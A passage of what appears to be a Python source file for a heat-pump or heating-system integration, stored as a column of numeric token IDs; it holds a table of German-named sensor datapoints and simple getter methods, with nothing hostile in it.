3256,
705,
44,
24645,
47447,
23065,
76,
362,
3256,
705,
6322,
51,
62,
38978,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
1802,
25,
19203,
12261,
19,
3256,
705,
44,
24645,
47447,
23065,
76,
513,
3256,
705,
6322,
51,
62,
38978,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
8949,
25,
19203,
12261,
19,
3256,
705,
54,
1670,
86,
24929,
47447,
23065,
76,
352,
3256,
705,
6322,
51,
62,
38978,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
15143,
25,
19203,
12261,
19,
3256,
705,
54,
1670,
86,
24929,
47447,
23065,
76,
362,
3256,
705,
6322,
51,
62,
38978,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
15349,
25,
19203,
12261,
19,
3256,
705,
54,
1670,
86,
24929,
47447,
23065,
76,
513,
3256,
705,
6322,
51,
62,
38978,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
14436,
25,
19203,
12261,
19,
3256,
705,
50,
692,
86,
861,
74,
273,
260,
21841,
333,
3256,
705,
6322,
51,
62,
12966,
30094,
3256,
6407,
11,
705,
42,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
13343,
25,
19203,
12261,
19,
3256,
705,
50,
1845,
69,
461,
13165,
3256,
705,
6322,
51,
62,
12966,
30094,
3256,
6407,
11,
705,
42,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
15696,
25,
19203,
42,
44,
3256,
705,
1273,
78,
263,
2150,
3256,
705,
6322,
51,
62,
38978,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
16226,
25,
19203,
42,
44,
3256,
705,
16305,
4029,
861,
368,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
15495,
25,
19203,
42,
44,
3256,
705,
38,
274,
321,
83,
4666,
5768,
9744,
3256,
705,
6322,
51,
62,
3351,
4272,
3256,
10352,
11,
705,
4,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
16003,
25,
19203,
42,
44,
3256,
705,
53,
273,
75,
559,
701,
368,
525,
2541,
14136,
2044,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
9796,
25,
19203,
42,
44,
3256,
705,
19580,
14136,
2044,
74,
260,
8802,
388,
431,
3256,
705,
6322,
51,
62,
38978,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
13374,
25,
19203,
42,
44,
3256,
705,
19580,
27545,
28284,
317,
16,
3256,
705,
6322,
51,
62,
36695,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
13539,
25,
19203,
42,
44,
3256,
705,
36,
278,
648,
412,
16,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
17318,
25,
19203,
42,
44,
3256,
705,
36,
278,
648,
412,
17,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
17342,
25,
19203,
12038,
16,
3256,
705,
1273,
78,
263,
2150,
3256,
705,
6322,
51,
62,
38978,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
12279,
25,
19203,
12038,
16,
3256,
705,
54,
1670,
86,
30493,
368,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
18693,
25,
357,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
12038,
16,
3256,
705,
53,
273,
75,
559,
701,
368,
525,
2541,
14136,
2044,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
19048,
25,
19203,
12038,
16,
3256,
705,
19580,
14136,
2044,
74,
260,
8802,
388,
431,
3256,
705,
6322,
51,
62,
38978,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
19035,
25,
19203,
12038,
16,
3256,
705,
19580,
27545,
28284,
317,
16,
3256,
705,
6322,
51,
62,
36695,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
15136,
25,
19203,
12038,
16,
3256,
705,
36,
278,
648,
412,
16,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
7982,
25,
19203,
12038,
16,
3256,
705,
36,
278,
648,
412,
17,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
20416,
25,
19203,
12038,
17,
3256,
705,
1273,
78,
263,
2150,
3256,
705,
6322,
51,
62,
38978,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
19409,
25,
19203,
12038,
17,
3256,
705,
54,
1670,
86,
30493,
368,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
17031,
25,
357,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
12038,
17,
3256,
705,
53,
273,
75,
559,
701,
368,
525,
2541,
14136,
2044,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
19755,
25,
19203,
12038,
17,
3256,
705,
19580,
14136,
2044,
74,
260,
8802,
388,
431,
3256,
705,
6322,
51,
62,
38978,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
13151,
25,
19203,
12038,
17,
3256,
705,
19580,
27545,
28284,
317,
16,
3256,
705,
6322,
51,
62,
36695,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
19710,
25,
19203,
12038,
17,
3256,
705,
36,
278,
648,
412,
16,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
18112,
25,
19203,
12038,
17,
3256,
705,
36,
278,
648,
412,
17,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
13108,
25,
19203,
12038,
18,
3256,
705,
1273,
78,
263,
2150,
3256,
705,
6322,
51,
62,
38978,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
20248,
25,
19203,
12038,
18,
3256,
705,
54,
1670,
86,
30493,
368,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
11323,
25,
357,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
12038,
18,
3256,
705,
53,
273,
75,
559,
701,
368,
525,
2541,
14136,
2044,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
23134,
25,
19203,
12038,
18,
3256,
705,
19580,
14136,
2044,
74,
260,
8802,
388,
431,
3256,
705,
6322,
51,
62,
38978,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
21761,
25,
19203,
12038,
18,
3256,
705,
19580,
27545,
28284,
317,
16,
3256,
705,
6322,
51,
62,
36695,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
22169,
25,
19203,
12038,
18,
3256,
705,
36,
278,
648,
412,
16,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
22352,
25,
19203,
12038,
18,
3256,
705,
36,
278,
648,
412,
17,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
17501,
25,
19203,
12310,
3256,
705,
1273,
78,
263,
2150,
3256,
705,
6322,
51,
62,
38978,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
21056,
25,
19203,
12310,
3256,
705,
54,
1670,
86,
30493,
368,
525,
2541,
12347,
352,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
21643,
25,
19203,
12310,
3256,
705,
12966,
525,
2541,
25910,
293,
74,
13165,
352,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
21503,
25,
19203,
12310,
3256,
705,
36,
278,
648,
412,
16,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
23666,
25,
19203,
12310,
3256,
705,
36,
278,
648,
412,
17,
357,
35,
2575,
2704,
1046,
8,
3256,
705,
6322,
51,
62,
11395,
62,
31715,
62,
37535,
3256,
10352,
11,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
75,
14,
71,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
12713,
25,
19203,
12310,
3256,
705,
36,
278,
648,
412,
18,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
25500,
25,
19203,
12310,
3256,
705,
19580,
4294,
668,
260,
8802,
388,
431,
14277,
47,
16,
3256,
705,
6322,
51,
62,
38978,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
25181,
25,
19203,
12310,
3256,
705,
19580,
27545,
28284,
317,
16,
3256,
705,
6322,
51,
62,
36695,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
24356,
25,
19203,
12310,
3256,
705,
19580,
27545,
28284,
317,
17,
3256,
705,
6322,
51,
62,
36695,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
20224,
25,
19203,
12310,
3256,
705,
19580,
27545,
28284,
317,
18,
3256,
705,
6322,
51,
62,
36695,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
20299,
25,
19203,
12310,
3256,
705,
19580,
27545,
28284,
317,
19,
3256,
705,
6322,
51,
62,
36695,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
22986,
25,
19203,
12310,
3256,
705,
35,
2575,
2704,
1046,
3256,
705,
6322,
51,
62,
11395,
62,
31715,
62,
37535,
3256,
10352,
11,
705,
75,
14,
71,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
22909,
25,
19203,
12310,
3256,
705,
461,
83,
2731,
293,
1004,
396,
2150,
3256,
705,
6322,
51,
62,
13434,
3256,
10352,
11,
705,
74,
54,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
22613,
25,
19203,
43538,
43,
3256,
705,
1273,
78,
263,
2150,
3256,
705,
6322,
51,
62,
38978,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
24041,
25,
19203,
43538,
43,
3256,
705,
15167,
76,
3256,
705,
6322,
51,
62,
41473,
54,
19076,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
6640,
25,
19203,
43538,
43,
3256,
705,
36056,
270,
23065,
76,
352,
3256,
705,
6322,
51,
62,
38978,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
25326,
25,
19203,
43538,
43,
3256,
705,
36056,
270,
23065,
76,
362,
3256,
705,
6322,
51,
62,
38978,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
24848,
25,
19203,
43538,
43,
3256,
705,
36056,
270,
23065,
76,
513,
3256,
705,
6322,
51,
62,
38978,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
24652,
25,
19203,
43538,
43,
3256,
705,
5317,
641,
452,
75,
518,
701,
2150,
3537,
62,
32,
2937,
3256,
705,
6322,
51,
62,
38978,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
24235,
25,
19203,
43538,
43,
3256,
705,
5317,
641,
452,
75,
518,
701,
2150,
7253,
19608,
388,
3256,
705,
6322,
51,
62,
10430,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
20708,
25,
19203,
43538,
43,
3256,
705,
5317,
641,
452,
75,
518,
701,
2150,
5268,
19608,
388,
3256,
705,
6322,
51,
62,
10430,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
23871,
25,
19203,
43538,
43,
3256,
705,
5317,
641,
452,
75,
518,
701,
2150,
7253,
2736,
270,
3256,
705,
6322,
51,
62,
7575,
5189,
12393,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
23313,
25,
19203,
43538,
43,
3256,
705,
5317,
641,
452,
75,
518,
701,
2150,
5268,
2736,
270,
3256,
705,
6322,
51,
62,
7575,
5189,
12393,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
24063,
25,
19203,
43538,
43,
3256,
705,
36056,
270,
86,
13,
5452,
794,
4879,
354,
27839,
3537,
62,
32,
2937,
3256,
705,
6322,
51,
62,
38978,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
26422,
25,
19203,
43538,
43,
3256,
705,
36056,
270,
86,
13,
5452,
794,
4879,
354,
27839,
7253,
19608,
388,
3256,
705,
6322,
51,
62,
10430,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
13454,
25,
19203,
43538,
43,
3256,
705,
36056,
270,
86,
13,
5452,
794,
4879,
354,
27839,
5268,
19608,
388,
3256,
705,
6322,
51,
62,
10430,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
27829,
25,
357,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
43538,
43,
3256,
705,
36056,
270,
86,
13,
5452,
794,
4879,
354,
27839,
7253,
2736,
270,
3256,
705,
6322,
51,
62,
7575,
5189,
12393,
3256,
6407,
11,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
25090,
25,
357,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
43538,
43,
3256,
705,
36056,
270,
86,
13,
5452,
794,
4879,
354,
27839,
5268,
2736,
270,
3256,
705,
6322,
51,
62,
7575,
5189,
12393,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
26826,
25,
19203,
43538,
43,
3256,
705,
43,
518,
701,
2150,
82,
301,
3046,
68,
3256,
705,
6322,
51,
62,
3351,
4272,
3256,
10352,
11,
705,
4,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
25307,
25,
19203,
43538,
43,
3256,
705,
4826,
2290,
701,
11498,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
21409,
25,
19203,
43538,
43,
3256,
705,
37,
2442,
354,
2290,
701,
11498,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
26753,
25,
19203,
43538,
43,
3256,
705,
35,
2575,
82,
27906,
1168,
15712,
701,
3256,
705,
6322,
51,
62,
37535,
32184,
62,
76,
18,
14,
71,
3256,
10352,
11,
705,
535,
76,
14,
71,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
26118,
25,
19203,
43538,
43,
3256,
705,
35,
2575,
82,
27906,
2275,
2290,
701,
3256,
705,
6322,
51,
62,
37535,
32184,
62,
76,
18,
14,
71,
3256,
10352,
11,
705,
535,
76,
14,
71,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
23378,
25,
19203,
43538,
43,
3256,
705,
3886,
6603,
20768,
271,
959,
2150,
3256,
705,
6322,
51,
62,
33,
970,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
27191,
25,
19203,
43538,
43,
3256,
705,
3886,
6603,
267,
14822,
3262,
62,
2364,
268,
3256,
705,
6322,
51,
62,
33,
970,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
16677,
25,
19203,
43538,
43,
3256,
705,
3886,
6603,
5513,
13508,
301,
62,
3212,
354,
22462,
268,
3256,
705,
6322,
51,
62,
33,
970,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
28369,
25,
19203,
43538,
43,
3256,
705,
3886,
6603,
5452,
49737,
3256,
705,
6322,
51,
62,
33,
970,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
23120,
25,
19203,
43538,
43,
3256,
705,
37,
23341,
12678,
25,
44707,
62,
54,
32074,
3256,
705,
6322,
51,
62,
33,
970,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
28174,
25,
19203,
43538,
43,
3256,
705,
37,
23341,
12678,
25,
3873,
259,
15122,
3256,
705,
6322,
51,
62,
33,
970,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
27621,
25,
19203,
43538,
43,
3256,
705,
37,
23341,
12678,
25,
44143,
10247,
263,
647,
3256,
705,
6322,
51,
62,
33,
970,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
19038,
25,
19203,
43538,
43,
3256,
705,
37,
23341,
12678,
25,
5452,
49737,
3256,
705,
6322,
51,
62,
33,
970,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
26937,
25,
19203,
48802,
43,
3256,
705,
1273,
78,
263,
2150,
3256,
705,
6322,
51,
62,
38978,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
26607,
25,
19203,
48802,
43,
3256,
705,
13056,
5034,
1443,
433,
3256,
705,
6322,
51,
62,
39,
53,
2246,
4264,
81,
19076,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
27368,
25,
19203,
48802,
43,
3256,
705,
1544,
528,
293,
396,
2150,
3256,
705,
6322,
51,
62,
13434,
3256,
10352,
11,
705,
54,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
27228,
25,
19203,
48802,
43,
3256,
705,
42,
518,
18519,
293,
396,
2150,
3256,
705,
6322,
51,
62,
13434,
3256,
10352,
11,
705,
54,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
11546,
25,
19203,
48802,
43,
3256,
705,
42,
7878,
11498,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
30110,
25,
19203,
48802,
43,
3256,
705,
16305,
4029,
861,
368,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
28581,
25,
19203,
48802,
43,
3256,
705,
49,
518,
694,
75,
559,
701,
368,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
28551,
25,
19203,
48802,
43,
3256,
705,
54,
1670,
86,
30493,
368,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
28598,
25,
19203,
48802,
43,
3256,
705,
32,
1046,
298,
368,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
22855,
25,
19203,
48802,
43,
3256,
705,
19580,
679,
528,
74,
260,
8802,
388,
431,
3256,
705,
6322,
51,
62,
38978,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
28481,
25,
19203,
48802,
43,
3256,
705,
19580,
47105,
12,
47,
388,
431,
3256,
705,
6322,
51,
62,
38978,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
27649,
25,
19203,
48802,
43,
3256,
705,
18,
54,
12,
52,
907,
354,
2501,
1151,
346,
367,
57,
62,
17947,
3256,
705,
6322,
51,
62,
11505,
26125,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
27778,
25,
19203,
48802,
43,
3256,
705,
18,
54,
12,
52,
907,
354,
2501,
1151,
346,
367,
57,
62,
42,
3256,
705,
6322,
51,
62,
11505,
26125,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
27230,
25,
19203,
48802,
43,
3256,
705,
19580,
412,
12,
1544,
528,
2150,
3256,
705,
6322,
51,
62,
38978,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
19884,
25,
19203,
48802,
43,
3256,
705,
2025,
30909,
437,
30915,
3256,
705,
6322,
51,
62,
11395,
62,
25460,
3256,
10352,
11,
705,
28875,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
31009,
25,
19203,
48802,
43,
3256,
705,
3123,
396,
2150,
82,
559,
22184,
993,
1326,
3256,
705,
6322,
51,
62,
13434,
3256,
10352,
11,
705,
54,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
17817,
25,
19203,
43538,
43,
3256,
705,
22417,
40539,
2150,
257,
21841,
452,
3256,
705,
6322,
51,
62,
38978,
3256,
10352,
11,
705,
19355,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
29691,
25,
19203,
43538,
43,
3256,
705,
22417,
40539,
2150,
1976,
333,
518,
4657,
316,
4801,
3256,
705,
6322,
51,
62,
38978,
3256,
6407,
11,
705,
19355,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
30483,
25,
19203,
12261,
16,
3256,
705,
16,
87,
25692,
86,
24929,
9435,
2150,
357,
70,
2572,
8,
3256,
705,
6322,
51,
62,
38978,
3256,
6407,
11,
705,
19355,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
24793,
25,
19203,
12310,
3256,
705,
51,
1095,
861,
22562,
3256,
705,
6322,
51,
62,
13739,
28925,
3256,
10352,
11,
705,
1199,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
28817,
25,
19203,
12310,
3256,
705,
38,
274,
321,
353,
2213,
363,
3256,
705,
6322,
51,
62,
13739,
28925,
62,
74,
1199,
3256,
10352,
11,
705,
74,
1199,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
29903,
25,
19203,
39,
38,
16,
3256,
705,
4826,
70,
459,
368,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
2757,
25,
19203,
39,
38,
16,
3256,
705,
3123,
396,
2150,
21370,
2398,
11231,
3256,
705,
6322,
51,
62,
3351,
4272,
3256,
6407,
11,
705,
4,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
1594,
25,
19203,
39,
38,
16,
3256,
705,
42,
7878,
11498,
525,
2541,
85,
2398,
11231,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
6407,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
939,
25,
19203,
39,
38,
17,
3256,
705,
4826,
70,
459,
368,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
580,
25,
19203,
39,
38,
17,
3256,
705,
3123,
396,
2150,
21370,
2398,
11231,
3256,
705,
6322,
51,
62,
3351,
4272,
3256,
6407,
11,
705,
4,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
22131,
25,
19203,
39,
38,
17,
3256,
705,
42,
7878,
11498,
525,
2541,
85,
2398,
11231,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
6407,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
27408,
25,
19203,
39,
38,
18,
3256,
705,
4826,
70,
459,
368,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
26956,
25,
19203,
39,
38,
18,
3256,
705,
3123,
396,
2150,
21370,
2398,
11231,
3256,
705,
6322,
51,
62,
3351,
4272,
3256,
6407,
11,
705,
4,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
22538,
25,
19203,
39,
38,
18,
3256,
705,
42,
7878,
11498,
525,
2541,
85,
2398,
11231,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
6407,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
27253,
25,
19203,
39,
38,
19,
3256,
705,
4826,
70,
459,
368,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
27791,
25,
19203,
39,
38,
19,
3256,
705,
3123,
396,
2150,
21370,
2398,
11231,
3256,
705,
6322,
51,
62,
3351,
4272,
3256,
6407,
11,
705,
4,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
27121,
25,
19203,
39,
38,
19,
3256,
705,
42,
7878,
11498,
525,
2541,
85,
2398,
11231,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
6407,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
28815,
25,
19203,
42,
44,
3256,
705,
38,
274,
321,
83,
4666,
5768,
9744,
85,
2398,
11231,
3256,
705,
6322,
51,
62,
3351,
4272,
3256,
6407,
11,
705,
4,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
20064,
25,
19203,
42,
44,
3256,
705,
16305,
4029,
861,
368,
525,
2541,
85,
2398,
11231,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
6407,
11,
705,
34,
11537,
201,
198,
220,
220,
220,
1782,
201,
198,
201,
198,
220,
220,
220,
2488,
12708,
24396,
201,
198,
220,
220,
220,
825,
651,
62,
25202,
7,
26059,
62,
312,
2599,
201,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
5860,
12694,
1988,
422,
2839,
7177,
286,
12694,
12,
961,
654,
37227,
201,
198,
220,
220,
220,
220,
220,
220,
220,
611,
288,
79,
62,
312,
287,
1148,
76,
23,
13,
35,
1404,
2969,
46,
1268,
4694,
13,
13083,
33529,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1441,
1148,
76,
23,
13,
35,
1404,
2969,
46,
1268,
4694,
58,
26059,
62,
312,
7131,
3792,
76,
23,
13,
6322,
62,
7206,
27389,
60,
201,
198,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1441,
6045,
201,
198,
201,
198,
220,
220,
220,
2488,
12708,
24396,
201,
198,
220,
220,
220,
825,
651,
62,
3672,
7,
26059,
62,
312,
2599,
201,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
5860,
12694,
1988,
422,
2839,
7177,
286,
12694,
12,
961,
654,
37227,
201,
198,
220,
220,
220,
220,
220,
220,
220,
611,
288,
79,
62,
312,
287,
1148,
76,
23,
13,
35,
1404,
2969,
46,
1268,
4694,
13,
13083,
33529,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1441,
1148,
76,
23,
13,
35,
1404,
2969,
46,
1268,
4694,
58,
26059,
62,
312,
7131,
3792,
76,
23,
13,
6322,
62,
20608,
60,
201,
198,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1441,
6045,
201,
198,
201,
198,
220,
220,
220,
2488,
12708,
24396,
201,
198,
220,
220,
220,
825,
651,
62,
4906,
7,
26059,
62,
312,
2599,
201,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
5860,
12694,
1988,
422,
2839,
7177,
286,
12694,
12,
961,
654,
37227,
201,
198,
220,
220,
220,
220,
220,
220,
220,
611,
288,
79,
62,
312,
287,
1148,
76,
23,
13,
35,
1404,
2969,
46,
1268,
4694,
13,
13083,
33529,
201,
198,
220,
220,
